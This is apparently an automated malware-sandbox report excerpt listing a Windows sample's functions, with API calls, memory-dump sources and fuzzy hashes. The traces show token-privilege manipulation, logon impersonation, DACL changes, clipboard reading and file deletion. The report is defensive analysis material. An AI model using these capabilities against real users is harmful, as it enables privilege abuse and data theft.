                                                                                                                                                                                                                                                                                                        • Opcode ID: c19e6eee9c59a893c584b620ecf04e014a7f4ebd6eb89e0aecb7ea581726f9e3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33537075569929d1f58300e1ced23ef9a5b512f3cf043164ea2867af671b5586
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c19e6eee9c59a893c584b620ecf04e014a7f4ebd6eb89e0aecb7ea581726f9e3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F030B1505701CFCB349F65D4A0866B7E5BF14329324897EE6D6C6620CB369840EF50
                                                                                                                                                                                                                                                                                                        Function 01006AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38a4ca07bf26fae4eb178279e4b4e0c5c0dcb2820b3ec12d914518862ba6310a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0fce08a3d9d54222f441fd660af908b5910758190546958e8b378a8ef65a890d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38a4ca07bf26fae4eb178279e4b4e0c5c0dcb2820b3ec12d914518862ba6310a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0E5B1B04201AAE7316BA89806BA5F7E9BB01315F00455ED4D5831C3CFB740F4A761
                                                                                                                                                                                                                                                                                                        Function 00FB684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                        • Instruction ID: f8cfc05d9cdf3467ff103dfd85f5ff9f2e314ab713d3cb8c15c250b813bc0efc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEF0D47650020DFBDF05DF90C941EAA7B79FF14318F248445F9159A251C336EA21ABA1
                                                                                                                                                                                                                                                                                                        Function 00FB3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FB3963
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92729173e22eb6f8d712e2185517c1edf22e743ad9b962e3a6234fb14bda14dd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 77b3bee15149de00621cf2bbc61664071c5a89b6eb4e1040c0d0bfa1760ed6ce
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92729173e22eb6f8d712e2185517c1edf22e743ad9b962e3a6234fb14bda14dd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F0A7709043149FE7629F24DC457D97BBCA701708F0040A5A6C496285DB754788CF81
                                                                                                                                                                                                                                                                                                        Function 00FB3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB3A76
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e534eb33a6afb5e8a74f5cd6717daa484ba8768f9417eb4c574a19e50a1810b5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 07c4ae7680a9b9671340cb0d1f138669111fddade297297dad1f3b44fbccfd9c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534eb33a6afb5e8a74f5cd6717daa484ba8768f9417eb4c574a19e50a1810b5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64E0CD7690012457C72192589C05FEA77DDDFC87A0F044071FD05D7258DD64DD80D690
                                                                                                                                                                                                                                                                                                        Function 00FF071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,00FF0A84,?,?,00000000,?,00FF0A84,00000000,0000000C), ref: 00FF0737
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 39c2e80597082683e27958f01a6c6d24a15c9b2ed2f5fd38c8f274155efe986a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 60f6735c98fb9ea6ef1f38621475e5ddf80e56849d73d7d90c581bb6f83b4ad0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39c2e80597082683e27958f01a6c6d24a15c9b2ed2f5fd38c8f274155efe986a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3D06C3200010DBBDF128E84DD46EDA3BAAFB48714F014000BE5856020C736E821AB90
                                                                                                                                                                                                                                                                                                        Function 0101EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d8ed9209f44b03293b7e36fe8bf2e151059f61219e34a12a9e53358828d09857
                                                                                                                                                                                                                                                                                                        • Instruction ID: 22c9622a24459185c1a2c1539ff60d4772f30ed7c06a75e03535ca17daabfee4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8ed9209f44b03293b7e36fe8bf2e151059f61219e34a12a9e53358828d09857
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB09B75000500057D65093C974955D374075522B57EC1BC0D9F5460D5C33D950F9650
                                                                                                                                                                                                                                                                                                        Function 0102664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindFirstFileW.KERNEL32(?,?), ref: 0101DCCB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DD1B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0101DD2C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindClose.KERNEL32(00000000), ref: 0101DD43
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102666E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe9c8c7647db17dc942866802817eb9a8ca89e1f12860736605ea402d8d9f3f7
                                                                                                                                                                                                                                                                                                        • Instruction ID: aa531259aaae45e060224818b4cc8a9c8e76c76284c73d74b4815be3d1a0a944
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe9c8c7647db17dc942866802817eb9a8ca89e1f12860736605ea402d8d9f3f7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FBF082357002144FC710EF59D844BAEB7E5AF98360F048449F9458B352CB79B801CF90

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 01011B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01011BD2
                                                                                                                                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 01011BF4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 01011C05
                                                                                                                                                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01011C1D
                                                                                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 01011C36
                                                                                                                                                                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 01011C40
                                                                                                                                                                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01011C5C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01011B48), ref: 01011A20
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A0B: CloseHandle.KERNEL32(?,?,01011B48), ref: 01011A35
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                        • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                                        • Opcode ID: 075e5498e96083381efe4966c5d6585d7b880f40586ea7478f1a6e4f7f737aec
                                                                                                                                                                                                                                                                                                        • Instruction ID: 07b5a3b06c9c9729590e3e735ec12d6ae1ed25069d23d5f871af98acf7b8c08b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 075e5498e96083381efe4966c5d6585d7b880f40586ea7478f1a6e4f7f737aec
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 968180B1900209AFEF25AFA4DD89FEE7FB8EF08304F544059FA94A6194D7398945CB50
                                                                                                                                                                                                                                                                                                        Function 010114AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01011518
                                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101154C
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 01011563
                                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0101159D
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010115B9
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 010115D0
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 010115D8
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010115DF
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01011600
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 01011607
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01011636
                                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01011658
                                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0101166A
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01011691
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 01011698
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010116A1
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116A8
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010116B1
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116B8
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010116C4
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116CB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: GetProcessHeap.KERNEL32(00000008,010114FD,?,00000000,?,010114FD,?), ref: 01011AED
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,010114FD,?), ref: 01011AF4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,010114FD,?), ref: 01011B03
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38928d9d30a1e48f2793f0753fd6f6b475ae9b4c058dc2eb39a41fff97c27ec8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d4ba1ff1aaed30706c93a4c7ef5fc7c630775b5e9f96bd51bba677de8fdc058
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38928d9d30a1e48f2793f0753fd6f6b475ae9b4c058dc2eb39a41fff97c27ec8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E717EB6900209BBEF50DFB4DC44FEEBBB8BF18240F084555FA95A7194D73A9905CBA0
                                                                                                                                                                                                                                                                                                        Function 0102F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(0104DCD0), ref: 0102F586
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0102F594
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0102F5A0
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F5AC
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F5E4
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F5EE
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F619
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0102F626
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0102F62E
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F63F
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F67F
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0102F695
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 0102F6A1
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F6B2
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0102F6D4
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102F6F1
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102F72F
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F750
                                                                                                                                                                                                                                                                                                        • CountClipboardFormats.USER32 ref: 0102F771
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F7B6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
